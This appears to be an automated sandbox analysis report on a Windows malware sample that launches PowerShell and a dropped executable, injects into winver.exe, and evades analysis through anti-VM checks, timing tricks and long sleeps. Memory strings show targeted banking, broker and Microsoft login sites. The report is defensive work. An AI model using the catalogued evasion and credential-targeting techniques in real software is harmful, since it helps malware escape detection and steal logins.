Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: zE1VxVoZ3W.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ydRhqlPsLsIczR.exe PID: 4420, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: 16B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: 3410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: 3360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: 95F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: A5F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: A800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory allocated: B800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: 48E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: 85A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: 95A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: 9790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory allocated: A790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Code function: 9_2_010CD1C0 rdtsc

9_2_010CD1C0

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3442	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4102	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Window / User API: threadDelayed 9654

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	API coverage: 0.8 %
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	API coverage: 0.2 %

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844	Thread sleep count: 3442 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe TID: 6264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe TID: 5312	Thread sleep count: 319 > 30
Source: C:\Windows\SysWOW64\winver.exe TID: 5312	Thread sleep time: -638000s >= -30000s
Source: C:\Windows\SysWOW64\winver.exe TID: 5312	Thread sleep count: 9654 > 30
Source: C:\Windows\SysWOW64\winver.exe TID: 5312	Thread sleep time: -19308000s >= -30000s
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe TID: 4040	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe TID: 4040	Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe TID: 4040	Thread sleep time: -49500s >= -30000s
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe TID: 4040	Thread sleep count: 31 > 30
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe TID: 4040	Thread sleep time: -31000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 62MfV68M.21.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 62MfV68M.21.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 62MfV68M.21.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: winver.exe, 00000015.00000002.4058013671.0000000002AE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH"jP
Source: 62MfV68M.21.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: IBBkYiJCUMDfM.exe, 00000016.00000002.4059092832.0000000000929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: 62MfV68M.21.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 62MfV68M.21.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 62MfV68M.21.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 62MfV68M.21.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 62MfV68M.21.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 62MfV68M.21.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
